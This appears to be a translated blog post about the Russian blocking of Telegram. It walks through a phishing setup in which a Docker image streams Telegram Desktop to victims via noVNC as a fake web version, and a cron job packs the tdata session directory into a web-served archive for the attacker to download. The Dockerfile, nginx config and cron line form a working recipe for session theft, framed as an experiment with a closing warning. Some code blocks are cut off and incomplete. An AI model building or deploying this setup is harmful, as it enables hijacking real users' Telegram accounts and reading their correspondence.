Telegram hijacking on panic waves

Today, the situation around the joint decision of the Federal Security Service of the Russian Federation and Roskomnadzor on blocking the Telegram messenger is developing very ambiguously. This decision is reckless for a number of reasons, and carries more problems than benefits in the fight against the threat of terrorism.

For a mature business that took into account the risks associated with government decisions, this created some inconvenience, because I had to use workarounds using a VPN. But for ordinary users who were not ready for such a turn of events, this brought new threats. In a panic, users began to search and use the first free VPNs they came across, without thinking that this could turn into a trap for them in the form of DNS push-ups, and other MITM attacks.

Telegram has the largest audience, and this fact the IT business could not ignore. Companies, in turn, have invested huge capital in the development of business tools using the API of this messenger. Even a number of government projects have invested in the development of technical support bots, a striking example of which is the State Service portal (EPUU).

The hype wave provoked a dispute with colleagues about the vulnerability of panicking users, and we decided to conduct an experiment on Telegram phishing.

Many users encountered problems accessing the Web version of this messenger and we decided to play on it. Our goal was to obtain the tdata profile, which stores the very notorious encryption keys and session data.

The composition of our recipe includes the following main components:

  • Telegram Desktop 1.2.17 (linux)
  • Docker version 17.05.0-ce
  • noVNC

According to the plan, we need to build a Docker image in which X and Telegram will start, and noVNC will broadcast the launched Telegram to us through the nginx client web browser.

Step 1: We restrict the execution of the desktop environment to the execution of only Telegram and broadcasting it through the VNC server.

To do this, create a .vnc / xstartup file with the following contents:

if [ -z "$VNCAPP" ]
  # Uncomment the following two lines for normal desktop:
   exec /etc/X11/xinit/xinitrc
  [ -x /etc/vnc/xstartup ] && exec /etc/vnc/xstartup
  [ -r $HOME/.Xresources ] && xrdb $HOME/.Xresources
  xsetroot -solid grey
  vncconfig -iconic &
  x-terminal-emulator -geometry 80x24+10+10 -ls -title "$VNCDESKTOP Desktop" &
  x-window-manager &
  xsetroot -solid black
  vncconfig -iconic &
  x-window-manager &
  sleep 10
  vncserver -kill $DISPLAY

Step 2: We forward the noVNC broadcast to port 80 using nginx.

We create the default configuration file to put it in the image later.

upstream vnc_proxy {
server {
        listen 80 default_server;
        listen [::]:80 default_server;
location / {
add_header Access-Control-Allow-Origin *;
proxy_set_header Host $host;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_redirect default;
client_max_body_size 10m;
client_body_buffer_size 128k;
proxy_connect_timeout 90;
proxy_send_timeout 90;
proxy_read_timeout 90;
proxy_buffer_size 4k;
proxy_buffers 4 32k;
proxy_busy_buffers_size 64k;
proxy_temp_file_write_size 64k;
location /websockify {
          proxy_http_version 1.1;
          proxy_pass http://vnc_proxy/;
          proxy_set_header Upgrade $http_upgrade;
          proxy_set_header Connection "upgrade";
          # VNC connection timeout
          proxy_read_timeout 61s;
          # Disable cache
          proxy_buffering off;

Step 3: Since we were building an experimental model, and not a full-fledged Telegram phishing service, to extract the data, we decided to copy the archive of the tdata directory using cron to one of the directories available to the web server.

Create a cron file with the following contents

* * * * *  root tar -czf /root/tests/data.tar.gz /root/.local/share/TelegramDesktop

Step 4: VNC:

This step requires customization of noVNC, we cut out the toolbars from it and registered an automatic connection to the VNC server by specifying a password that matches the password .vnc / passwd this password can be generated with the vncpasswd utility.

Step 5: Assembling the Docker image:

All that we have prepared in advance, including the Telegram binary, put into one directory, create the Dockerfile and proceed with the assembly.

# Version: 0.0.1
FROM vcatechnology/linux-mint
MAINTAINER Poul Lysunenko 
RUN apt update 
RUN apt install -y net-tools language-pack-ru cinnamon nginx chromium-browser vnc4server xvnc4viewer xfonts-base
RUN locale-gen ru_RU.UTF-8 && dpkg-reconfigure locales
COPY noVNC/ /root/
COPY .vnc/ /root/.vnc
COPY default /etc/nginx/sites-available/
COPY Telegram /root/
COPY cron /etc/cron.d/sample
RUN apt install -y cron
ENTRYPOINT /usr/sbin/service nginx start && /usr/sbin/service cron start && VNCAPP=/root/Telegram vnc4server -depth 24 -geometry 800x600 && /root/utils/ --vnc localhost:5901

Step 6: After assembling and launching the image, using all the knowledge and skills in social engineering, we invite the victim of the experiment to taste an alternative to the Telegram web version.

A minute after authorization, download the profile /tests/data.tar.gz


As you know, I won the argument with my colleagues, but this gain did not bring joy. The state of affairs in the field of information security has negative trends related to the conditions of sharp changes in Internet usage policies in Russia. This quick study showed that people who are even savvy in information technology can step on the rake that the attackers place.

PS: Do not forget to compare the open sessions of your messengers, maybe someone is reading now your correspondence

Also popular now: